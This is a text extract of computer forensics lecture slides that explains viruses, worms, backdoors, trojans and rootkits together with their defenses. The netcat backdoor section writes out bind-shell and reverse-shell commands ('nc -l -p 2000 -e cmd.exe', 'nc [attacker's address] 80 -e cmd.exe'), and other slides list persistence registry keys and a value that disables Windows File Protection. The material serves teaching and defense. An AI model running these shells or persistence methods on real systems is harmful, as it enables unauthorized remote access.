Viruses, Worms,

advertisement
Viruses, Worms, Mobile Code
COEN 252: Computer Forensics
Viruses: The Principle


Virus attaches itself to a host that can
execute instructions contained in the
virus.
When the host is invoked, the virus
copies itself to other locations on the
system.
Executables

Companion Infection Technique

OS will call the virus when the user requests the
companion file.





Windows:
Virus is Notepad.com to hide as Notepad.exe.
Set the hidden attribute to prevent the virus from being
seen.
Launch the true notebook.exe file from the virus.
If the user selects Start  Run and types in notebook,
then windows starts the virus (notebook.com instead of
notebook.exe)
Executables

Companion Infection Technique





Windows:
Virus renames Notepad.exe to Notepad.ex_
and hides it.
Virus takes the place of Notepad.exe.
Works with shortcuts.
Used in the Trilisa virus / worm (2002)
Executables

Companion Infection Technique

Virus uses alternate data stream feature of
NTFS:




Streams look like one file in explorer and
directory listings.
System activates the default stream, the virus.
Virus calls alternate stream.
Win2KStream Virus (2000)
Executables

Overwriting Techniques




Virus replaces part of an executable.
Usually the executable looses functionality.
Users will now that there is something wrong.
Prepending Techniques




Virus placed in front of executable.
After virus executes, host program is called.
Very easy for .com files.
Easy to clean files.


Bliss virus had a disinfect mode built into it.
Used by the NIMDA worm.
Executables

Appending Infection Technique



Insert itself at the end of host file.
Add a jump at the beginning of host file.
Stealth Techniques for Prepending and
Appending:




Compress host.
When virus calls hosts, host is uncompressed into
RAM.
Fill up total package (virus, compressed host) to
same size as original host.
Change filler so that checksum is not changed.
Boot Sector Modification


Target Master Boot Record or Partition Boot Sector.
Michelangelo Virus (1991).

Replaced MBR boot strap to elsewhere on disk.





First the virus loads itself into memory, then it passes control to the
original MBR boot sector.
Places itself into all boot sector of all floppies.
Memory-resident copy of the virus is attached to low-level BIOS
drivers.
Gets called when these are executed.
Can no longer spread under WinNT, Win2K, WinXP, only wreak
havoc, e.g. by overwriting the sectors right after the partition boot
sector.
Infection of Document Files

Many software use Macros:


MS Office, WordPerfect Office, StarOffice,
OpenOffice, AutoCAD, Excel, …
WinOffice runs code in subroutines





Document_Open()
Document_Close()
AutoExec()
….
Virus can copy itself to the victim’s Normal.dot file.

Normal.dot file is processed whenever WinOffice starts.
Other Targets


Source Code
Scripts

Visual Basic Scripts (.vbs) used by OS:




Startup.vbs
Exec.vbs
Shell scripts, Perl scripts
Java Class Files

Platform independent viruses
Propagation Techniques

Removable Storage

Boot sector viruses, executable viruses



Yamaha’s CD-R drive firmware update
contained the Chernobyl virus.
Email attachments
Shared directories
Anti-Virus Defense

Antivirus software on gateways:






User workstations
File servers
Mail servers
Application servers
Border firewalls
Handhelds.
Anti-Virus Defense

Virus signatures

Looks for small patterns indicative of a known
virus.


Polymorphic viruses
Heuristics

Looks for programs with bad behavior:





Attempts
Attempts
Attempts
Attempts
…
to
to
to
to
access the boot sector
locate all files in a directory
write to an exe file
delete hard drive contents
Anti-Virus Defense

Integrity Verification



Generate database of hashes of important files.
Recalculate these hashes and compare them to
known values.
Configuration Hardening




Least privilege
Minimize active components.
Set warnings (e.g. against macros)
User education
Anti-Anti-Virus Defense

Stealthing





Hide virus files.
Intercept scanning of infected files.
Slow rate of infection.
…
Polymorphism and Metamorphism




Change order of instructions in virus code
Use equivalent code (increment = subtracting with
-1)
Encryption of most of the virus body.
Slightly change functionality of virus as it spreads.
Anti-Anti-Virus Defense

Antivirus software deactivation



Kill processes known to be antivirus
processes.
Disable internet access to antivirus
vendor’s pages.
Change security settings (e.g. allow Word
macros to run)
Worms
Worms:
 Propagates across a network
 Typically, does not require user action
for propagation.
Virus:
 Infects files.
 Typically requires user interaction.
Worms
Worm Components





Warhead
Propagation Engine
Target Selection Algorithm
Scanning Engine
Payload
Worm Warhead

A piece of code that exploits a
vulnerability on the target system




Exploits such as Buffer Overflow Exploits
File Sharing Attacks
E-mail
Common Misconfigurations
Worm Propagation Engine



After gaining access, the worm must transfer
itself to the target machine.
Some worms are completely contained in the
warhead.
File Transfer Mechanisms




FTP
TFTP
HTTP
SMB (MS Server Message Block)


Windows file sharing
Unix servers running SAMBA
Worm Target Selection
Algorithm

Once the worm has gained control of a
target, it starts looking for new targets.






E-mail addresses
Host lists
Trusted Systems
Network Neighborhood
DNS queries
Randomly selected ip address.
Worm Scanning Engine

Once targets are identified, the worm
scans for the original vulnerability.
Worm Payload




Some specific action done on behalf of
the attacker.
Opening up a backdoor.
Planting a distributed denial of service
attack.
Performing complex calculations:


password cracking
math research (actually happened)
Worm Spread

Worm spread is limited

Diversity of machines

Tiny worm





targeted only machines running security software
from a medium company
was successful in infecting most machines.
Worms can contain support for multiple entry
methods.
Too many victims crash
Fast worms can cause network congestion
Worm Trends



Multiplatform worms
Multiexploit worms
Zero-day exploit worms


Fast-spreading worms: Warhol / Flash


pre-scan targets
Polymorphic worms


No chance to patch
Change appearance
Metamorphic worms

Change functionality
Worm Defenses




Ethical (?) Worms
Antivirus tools
Fast patching services
Firewalling



Block arbitrarily outbound connections
Prevents spreading
Establishment of Incident Response
Capabilities
Malicious Mobile Code
Backdoors
Backdoor:
A program that allows attackers to bypass
normal security controls on a system,
gaining access to which they are not
entitled.
Backdoor Types




Local Escalation of Privilege
Remote execution of individual
commands.
Remote command-line access.
Remote control of the GUI.
Backdoor Installation




Attacker has compromised the system
Virus, worm, or malicious mobile code
installs the backdoor.
Social engineering: Tricking the victim
into installing the backdoor.
...
Starting backdoors
automatically
Attacker wants to maintain access to the
system.
 Backdoor needs to restart whenever the
system restarts.
 Methods are OS dependent.
Starting backdoors
automatically on Windows



Altering Startup Files and Folders
Registry
Task Scheduler
Starting backdoors
automatically on Windows

Startup folders and files

Autostart folders for individual users and all
users.
Starting backdoors
automatically on Windows
Use:
 win.ini
 system.ini





Modify “shell=explorer.exe” on Win9x
wininit
winstart.bat (Win9x)
Autoexec.bat (Win9x)
Config.sys (Win9x)
Starting backdoors
automatically on Windows

Registry keys start programs on login or
reboot:

HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\





RunServicesOnce
RunServices
RunOnce
Run
RunOnceEx
Starting backdoors
automatically on Windows

HKCU\SOFTWARE\Microsoft\Windows\Curr
entVersion\





RunServicesOnce
RunServices
RunOnce
Run
RunOnceEx
Starting backdoors
automatically on Windows

Registry keys start programs on login or
reboot:



HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVers
ion\ShellServiceObjectDelayLoad
HKLM\SOFTWARE\Policies\Microsoft\Windows\Sys
tem\


Scripts
Explorer\Run
Starting backdoors
automatically on Windows

Registry keys start programs on login or
reboot:



HKCU\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
HKCU\SOFTWARE\Microsoft\Windows\CurrentVers
ion\ShellServiceObjectDelayLoad
HKCU\SOFTWARE\Policies\Microsoft\Windows\Sys
tem\


Scripts
Explorer\Run
Starting backdoors
automatically on Windows

Registry keys start programs on login or
reboot:

HKCR\Exefiles\Shell\Open\Command

Indicates programs that will be run every time
another .exe is run.
Starting backdoors
automatically on Windows

Use the task scheduler

Check scheduled tasks with autoruns from
Sysinternals
Starting backdoors
automatically on Unix





Modifying the init daemon
Modifying system and service
initialization scripts
Modify the internet daemon script
Change user startup scripts
Schedule jobs with Cron
Starting backdoors
automatically on Unix

Modify the init daemon



init daemon is the first process to start.
uses /etc/inittab to find other processes
that need to be started
attacker merely adds line to inittab.
Starting backdoors
automatically on Unix

Modify system and service initialization scripts

About 20+ system scripts


Located in /etc/rc.d or /etc/init.d
Or merely plant a backdoor in an initialization
script for another service.

E.g. ppp daemon


for PPP modem dial-up connections
inetd


network daemon
change /etc/inetd.conf
Starting backdoors
automatically on Unix

Adjust user startup scripts






.login
.cshrc
/etc/profile
.logout
.xinitrc
.xsession
Starting backdoors
automatically on Unix

Schedule jobs with Cron
Backdoor Defenses

System integrity tools like tripwire
Backdoor with netcat


netcat compiles into executable nc.
On the victim:

nc –l –p 2000 –e cmd.exe (Windows)



nc –l –p 2000 –e /bin/sh (Unix)
Sets up a listener on port 2000.
On the attacker:

nc [victim address] 2222

gives command shell.
Backdoor with netcat


Only works if attacker can establish a
TCP connection to the port on the
victim.
Firewalls can block this.
Backdoor with netcat


Use an open door in the firewall:
Shoveling a shell

On the attacker’s machine:

nc –l –p 80


netcat listener on port 80
On the victim’s machine:



nc [attacker’s address] 80 –e cmd.exe
initializes outgoing connection to attacker
then executes a shell
Backdoor with netcat

Alternatives to netcat
cryptcat
 Tini
Q
 Bindshell

Md5bd
 UDP_Shell
 TCPshell
 Crontabbackdoor

Virtual Network Computing

Remote GUI tools








Virtual Network Computing (VNC)
Windows Terminal Services
Remote Desktop Service
Citrix MetaFrame
PCAnywhere
Dameware
Back Orifice 2000
SubSeven
www.megasecurity.org
Virtual Network Computing


VNC server allow to shovel a shell.
Can be remotely installed:





Attacker has remote shell access on victim
Attacker installs copy of VNC on his machine
Attacker exports the registry keys associated with
VNC to the victim
Attacker moves four files to victim
Attacker adds registry changes to victim


This will display a VNC installation successful message on
the victim
Attacker starts VNC
Defenses against Backdoor
Shell Listeners

Use firewalls



Look for open ports.



Filter traffic in both directions.
Firewall individual machines.
On the network (Nmap)
Or with a trusted tool (on CD) locally.
Close unneeded ports.
Backdoors without ports

ICMP backdoor



ICMP messages don’t use ports.
Firewalls need to let some ICMP messages
pass.
ICMP messages can carry a few bytes of
payload.
Backdoors without ports

ICMP backdoors:




Loki
007shell
ICMP Tunnel
available at www.packetstormsecurity.org
for free.
Non-Promiscuous Sniffing
Backdoors

Sniffer in non-promiscuous mode sniffs
for commands in packets destined for
the local machine.
Non-Promiscuous Sniffing
Backdoors

Cd00r

sniffs for TCP packets to ports X, Y, Z



syn packets to X, Y, Z: sniffer activates backdoor.
backdoor opens TCP port and shovels shell.





the ports are not open
This can be detected.
Is however unnecessary with a sniffer
“Future releases” will discontinue this practice.
Just craft special packets instead.
when backdoor closes, port is closed.
Promiscuous Sniffing
Backdoors

Promiscuous sniffer can gather packets
send to any machine on the same LAN
segment.

IP address of suspicious traffic does not
have to originate on the victim machine.
Promiscuous Sniffing
Backdoors
Promiscuous Sniffing
Backdoors

Attacker has compromised the DSN
server and installed a promiscuous
sniffing backdoor there.
Promiscuous Sniffing Backdoor


Attacker sends a
packet to the
webserver at port
80.
Messages passes
through the firewall.
Promiscuous Sniffing Backdoor


Sniffer on the DSN
server sniffs the
package.
Webserver does not
know what to do
with a malformed
request.
Firewall:
Message to
webserver.
Let pass.
Promiscuous Sniffing Backdoor




Backdoor on DSN
reacts to packet.
Sends back message
to attacker.
Spoofed return
address from
webserver.
Firewall lets it pass.
Firewall:
Message from
webserver.
Let pass.
Defenses against backdoors
without ports



Backdoors still create running
processes.
Backdoors still create network packets.
Backdoors might put MAC cards into
promiscuous mode.
Trojan Horses
a program with added functionality.
Trojan Horses

Hiding names


change name (of netcat, vnc, ...)
play with windows suffixes

just_text.txt


This is ONE word with a bunch of spaces in it
Use the .shs suffix (suppressed by system)



.exe
just_text.txt
Shell scrap object
.shs
Windows uses the suffix to decide what to do
with a file.
Trojan Horses

Hiding names

take someone else’s name.


overeager system administrators might even remove the
legitimate program thinking it might be your fake
program.
windows does not let you kill program with certain
names.



regardless of content
csrss.exe, services.exe, smss.exe, System, System Idle
Process, winlogon.exe
There might be more than one legitimate process named
winlogon or csrcc.exe
Trojan Horses

Hiding names


use common typos of important files for a
Trojan
ifconfig instead of ipconfig.
Trojan Horses Defenses




Pskill will kill any horse / process.
Fport and lsof will find open ports
associated with the horse.
Tripwire could find substitutes for
executables.
Filter email attachments that are
executable.
Wrappers

Wrap malware in a good program.

A.k.a. binders, packers, exe binders, exe
joiners.


AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle,
Perl2Exe, Saran Wrap, TOPV4, Trojan Man
Combat with



Anti-virus software
File System Integrity checkers (Tripwire)
Posted MD5, SHA1 values of downloads
Definition of Rootkit
Rootkits
Rootkits are Trojan horse backdoor
tools that modify existing operating
system software so that an attacker can
keep access to and hide on a machine.
Unix User Mode Rootkits

Rootkits are bundled packages
consisting of:





Binary replacements that provide backdoor
access.
Binary replacements that hide the attacker.
Other tools for hiding
Additional Odds and Ends
Installation Script
Unix User Mode Rootkits: LRK


Around since the early nineties.
version 6 is appearing.
Unix User Mode Rootkits: LRK


Around since the early nineties.
version 6 is appearing.
Unix User Mode Rootkits: LRK

Backdoor Access:

Trojan login, rsh, ssh



Remote shell on a chosen port


Altered login, rshd, sshd
Same functionality, but with a special backdoor
password for “rewt” that gives root access.
altered inetd, tcpd
Local privilege escalation backdoors:

chfn, chsn, passwd, su
Unix User Mode Rootkits: LRK

Binary Replacements that hide the
attacker:

Processes





ps
top
pidof
killall
crontab
Unix User Mode Rootkits: LRK

Network use



Files




netstat
ifconfig
ls
find
du (omits space taken by hidden files
Events

syslogd
Unix User Mode Rootkits: LRK

Other tools for hiding:

fix



resets the MAC times of trojaned system files.
pads files so that the CRC check matches the one of the
original files.
zap2, wtmp

blanks out / edits information in important files:



utmp, wtmp
 stores data on users currently / ever logged in.
btmp
 stores data on bad logins.
lastlog
 stores data on last login for users
Unix User Mode Rootkits: LRK

Goodies

bindshell



creates a backdoor listener
attacker connects with netcat to the listener
sniffer

linsniffer grabs IDs and passwords for ftp,
telnet
Unix User Mode Rootkits: LRK

LRK Installation Script


makefile allows to choose configuration
No need to understand any of the
workings of LRK

installs in seconds / few minutes
Unix User Mode Rootkits: URK

Universal Root Kit


Functions on a variety of Unix variants
Has slightly less functionality than LRK
EFS2 Manipulations


RunEFS, Defiler’s toolkit foil computer
forensics investigations on a UNIX machine.
RunEFS



adds pointers of good blocks to the bad blocks
inodes.
stores data in them.
Cornoer’s Toolkit and derivatives don’t look at
these blocks.
EFS2 Manipulations

Defiler’s toolkit destroys data that a forensics
tool can harvest.


shred and other overwrite tools destroy data in a
block.
Defiler’s toolkit destorys inode and directory
information as well.


Necrofile scrubs inodes clean
Klismafile overwrites directory entries associated with
deleted files.


This leaves blank spots in a directory.
This shows that someone used Klismafile.
Windows User Mode Rootkits

Windows File Protection (WFP)

Scans for changes to critical executables and
libraries.



Compares digital signatures of 1700 files to a protected
file
If WFP detects a change it searches for an
authorized file in different locations.
WFP can be altered




Windows Service Pack Installations (Update.exe)
Hotfix distributions (Hotfix.exe)
Windows Update Feature
Windows Device Installer
Windows User Mode Rootkits

Implementing user mode rootkits in
windows:



Use existing interfaces
Overwrite file
Use DLL injection and API hooking to
manipulate running processes in memory.
Windows User Mode Rootkits

Use existing interfaces:
FakeGINA

sits between winlogon and
msgina
Windows User Mode Rootkits

Windows uses Graphical Identification aNd
Authentication (GINA)

Windows allows system administrators to
install third party GINA tools.


Attacker sets registry key


Windows ships with default GINA (msgina.dll)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon
to install Fakegina

Fakegina gathers passwords, passes logon credentials to the
real msgina.dll.
Windows User Mode Rootkits
Changing WFP Settings

WFP configuration is stored in the registry


Attacker can change system file and
then
1.
delete the version in DLL cache.



WFP cannot find a correct version.
Sends message to request system CD.
Administrator might ignore message
Windows User Mode Rootkits

Attacker can
2.
Alter the location of the Dllcache by
modifying the registry.


3.
WFP checks signatures and finds many
mistakes.
Log is full of warnings.
Turn off WFP by changing a registry key


WFP still active until reboot.
Warning message after reboot.
Windows User Mode Rootkits

Attacker can
4)
set the SFCDisable key to value
0xFFFFFF9D.




Completely disables WFP on Win2000
No dialog warning
Only a message that WFP is inactive.
Code Red II used method 4.
Windows User Mode Rootkits

DLL Injection

forces an exe process to accept a DLL it never
requested.





Allocate space in victim process for the DLL code to
occupy. (VirtualAllocEx)
Allocate space in victim process for the DLL parameters.
(VirtualAllocEx)
Write name and code into the memory space of the
victim process. (WriteProcessMemory)
Create a thread in the victim process
(CreateRemoteThread)
Free up resources in the victim process after execution is
complete.
Windows User Mode Rootkits

DLL Injection allows to hijack any process


Attacker must have Debug Programs right on
system.
Attacker uses DLL injection by



modifying running dll that displays information on
the screen.
Modified dll still calls original dll.
But does not display all the data.
Windows User Mode Rootkits

AFX Windows RootKit



Attacker uses afx windows rootkit configuration
console to generate code on his machine.
Then executes it on the victim’s machine.
AFX WinRK



installs itself in the System32 directory.
Creates iexplore.dll and explorer.dll
injects explorer.dll and iexplore.dll into
explorer.exe


That process displays the GUI to users.
hides network connections, files, ...
Rootkit Defenses

Preventing Root Kits


Harden systems and apply patches.
Detect Root Kits


File Integrity Checking (Signatures)
Root Kit Identification


Look for specific changes made in most root
kits
chkrootkit for Unix
Kernel Mode Rootkits

Kernel Functions






Process and Thread
Interprocess Communication
Memory
File System
Hardware
Interrupts
Kernel Mode Rootkits

Kernel

Relies on hardware
level protection


Ring 0 vs. Ring 3 for
Intel CPU
Prevents user
processes from
accessing critical
kernel data
structures.
Kernel Mode Rootkit


Processes running in kernel mode
belong to the kernel.
Administrator, root only invoke user
mode processes.


These processes access the kernel.
Change in kernel changes
behavior of all processes.
Kernel Mode Rootkit

Kernel Mode Rootkit Capabilities






File & Directory Hiding
Process Hiding
Network Port Hiding
Promiscuous Mode Hiding
Execution Redirection
Device Interception and Control
Kernel Mode Rootkit

Advantages over User Level Rootkit:


Changes all programs that try to discover
something from the kernel.
Statically linked binary forensic tools no
longer work
Linux Kernel
Get a laptop
and try it
out!
Linux Kernel

Linux allows us to look at many internal
kernel structures:

/proc




Slash proc
Virtual directory, lives only in memory.
Lots of commands just grab info from /proc.
We can write to certain areas of /proc such as
/proc/net
Linux Kernel

/proc



/cpuinfo
/devices
/ksmg


Log messages from kernel
/ksyms

List of all variables and functions that are
exported via loadable kernel modules on the
machine
Linux Kernel

/proc


/net
/stat


/sys


Statistics such as data about CPU, virtual
memory, hard drive usage
Kernel variables.
/version
Linux Kernel

/dev


Contains pointers to various devices.
/dev/kmem


Image of the running kernel’s memory
/dev/mem

Image of all the memory
Gibberish without special tools
Linux Kernel

User mode processes use System Calls to
access kernel.

Embedded in the systems libraries:







SYS_open
SYS_read
SYS_write
SYS_execve
SYS_setuid
SYS_get_kernel_syms
SYS_query_module
Linux Kernel

Located in




/usr/include/sys/syscall.h
/usr/include/bits/syscall.h
/usr/include/asm/unistd.h
Or similar locations.
Linux Kernel

System Call Table:



Array maintained by the kernel that maps
individual system call names and numbers.
Located also in memory.
On harddrive:


“less /boot/System.map”
Use strace to find the system calls made by a
command:

“strace ls”
Linux Kernel
Linux Kernel Manipulations

Loadable Kernel Modules

Legitimate Linux / Solaris kernel feature


Add support for new hardware
Can replace existing kernel features without
system reboot.
Linux Kernel Manipulations

Attacker uses
insmod to


Alter System Call
Table.
Load Kernel
module.
Linux Kernel Manipulations

Evil kernel module alters SYS_execve Looks at calling
process.

If process is for a program that attacker wants to redirect


Attacker can wrap the true SYS_execve code.


Evil kernel module actually calls another program.
Makes it easy to generate the altered version of SYS_execve.
This alteration defeats file integrity checking tools.

SYS_execve code is still there, only



Never called.
Called if not interfering with attacker (if wrapped).
True login function, true sshd, true … not called, but
replacements are.
Linux Kernel Manipulations


Loadable kernel modules do not survive
a system reboot.
Attacker alters programs in the boot
process.


init
Once inserted, loadable kernel module
hides changes to the altered boot process
Linux Kernel Manipulations

Mighty Adore



Loadable kernel module
Adore interface: Ava.
Kernel Intrusion System (KIS)

Comes with slick GUI
Linux Kernel Manipulations


Alternative to Loadable Kernel Module
Use /dev/kmem



Attackers can use tools that read and write
to kernel memory image.
Attacker can insert alternative code for
system calls.
Attacker can change the System Call Table.
Linux Kernel Manipulations

Patching Kernel Image File

Simplest way:

Attacker “patches” vmlinuz file.

Contains the kernel image.
Linux Kernel Manipulations

User Mode Linux (UML)




UML at user-mode-linux.sourceforge.net
Runs entire Linux kernel inside a normal
user-mode process.
Like VMWare, creates virtual environment.
Sysads, users are running in this virtual
environment.
Linux Kernel Manipulations

Kernel Mode Linux Project



Allows certain user processes to run in
kernel mode.
Attacker patches kernel with KML.
Attacker now has processes that run in
kernel mode.

Writes code to alter system call table and
system call code.
Defending the Linux Kernel

Prevention



Deny superuser access to attackers.
Patch quickly.
Change kernel so that it no longer allows
loadable kernel modules.



Redhat 8.0, Redhat 9.0, Linux 2.5.41
Install Systrace to track and limit systems
calls.
Use Linux Security Module in your kernel.
Defending the Linux Kernel

Kernel Mode RootKit Detection



Look for suspicious network activity
File Integrity Checkers (to catch the not
quite good enough hacker).
chkrootkit

Looks for system anomalies.

Each directory has a link count. Link count should
be equal to the number of files + 2.
Defending the Linux Kernel

Kernel Mode RootKit Detection

Kernel Security Therapy Anti-Trolls (Linux
2.4)




Looks for changes to the system call table.
Scans /dev/kmem
Looks for memory locations of system calls and
compares with System.map
Creates fingerprints of system calls and various
critical programs.
Defending the Linux Kernel

Kernel Mode RootKit Detection

Syscall Sentry



Loadable kernel module.
Checks for modules that alter the system table.
Alerts system administrator in this case.
Windows Kernel


User process calls DLL
DLL can

return to user process.
Go to csrss.exe (client
server runtime)


Require kernel function
Windows Kernel


User process makes call to ReadFile
Win32 Subsytem DLL makes call to NtReadFile in
Ntdll.dll


Ntdll.dll makes a call to the Executive.




Ntdll.dll translates well-documented API into rather obscure
ones (that can be easily changed.)
Executive sits inside ntoskrnl.exe
Determines which piece of kernel code is needed to handle
request.
Kernel code interacts with hardware (disk).
Uses Hardware Abstraction Layer (HAL.dll).
Windows Kernel

Ntdll.dll call into kernel:

System service dispatching.


Essentially a system call.
Uses the System Service Dispatch Table.

Table indicates where the appropriate system
service code is located within the kernel.
Windows Kernel: Tools

Ctrl + Alt + Del

Task Manager Process Table
Windows Kernel: Tools

Start  Control Panel  Administrative Tools  Performance

Click “+” and check process
Windows Kernel: Tools

DependencyWalker
(www.dependencywalker.com)
Windows Kernel: Tools
Process Explorer
http://www.sysinternals.com/ntw2k/freeware/
procexp.shtml
Manipulating Windows Kernel

Same basic strategies as in Linux:





Evil Device Driver.
Alter running kernel in memory.
Overwrite kernel image on file.
Deploy kernel on a virtual system.
Run user-mode code at kernel level.
Manipulating Windows Kernel

Evil Device Driver




Alters system service call handling by loading a
device driver.
Replaces or alters kernel functions.
Needs administrator privileges.
Needs to get evil code to run:



Overwrite existing kernel functionality
Alter system service dispatch table to point to new
code.
Alter System Service Dispatcher.
Manipulating Windows Kernel

Altering a Running Kernel in Memory:

Windows uses the Global Descriptor Table
(GDT) to manage memory.



GDT stores division into various segments.
Store segment accessibility by ring 0/3.
Unfortunately, attacker can add a memory
segment to the GDT.




Greg Hoglund Phrak 55
Explains how to bypass Security Monitor.
Add memory segment from location 0x00000000 to
0xffffffff.
This gives memory access to all user processes!
Manipulating Windows Kernel

Altering a Running Kernel in Memory:



Manipulate \Device\PhysicalMemory object.
Use PhysMem from sysinternals.com.
Attacker can now change system
functionality.
Manipulating Windows Kernel

Patching the Kernel on the Hard Drive

System boot checks integrity of
Ntoskrnl.exe.



Thus, not possible to only change the kernel
file.
Have to change both the integrity checker and
the kernel.
Integrity checker sits in NTLDR.

Change one instruction to jump over the integrity
check.
Manipulating Windows Kernel

Patching the Kernel on the Hard Drive



Patch first NTLDR to disable integrity
check.
Then patch Ntoskrnl.exe to disable security
access check.
Now introduce rootkit.
Manipulating Windows Kernel

Create a fake system using a virtual
machine.

Variety of Virtual Machines




VMWare
Plex86
Virtual PC
Bochs
But need to hide start-up message.
Unlike Linux, that is difficult.
Protecting the Windows Kernel


Prevent access to the machine.
Detect a rootkit:


Antivirus tools recognize most rootkit files
before installation.
Some rootkits can be spotted afterwards.


Because developers were careless.
File Integrity Checkers
Protecting the Windows Kernel

Removing Rootkits


Analyze system without invoking the
kernel.
Use a FIRE or Knoppix bootable CD-ROM
and look at the hard drive.

Registry / File System.
Next Generation Malware

BIOS



Malware active before booting from a
device.
Bioscentral website for tools to look at
BIOS.
Microkernel
Download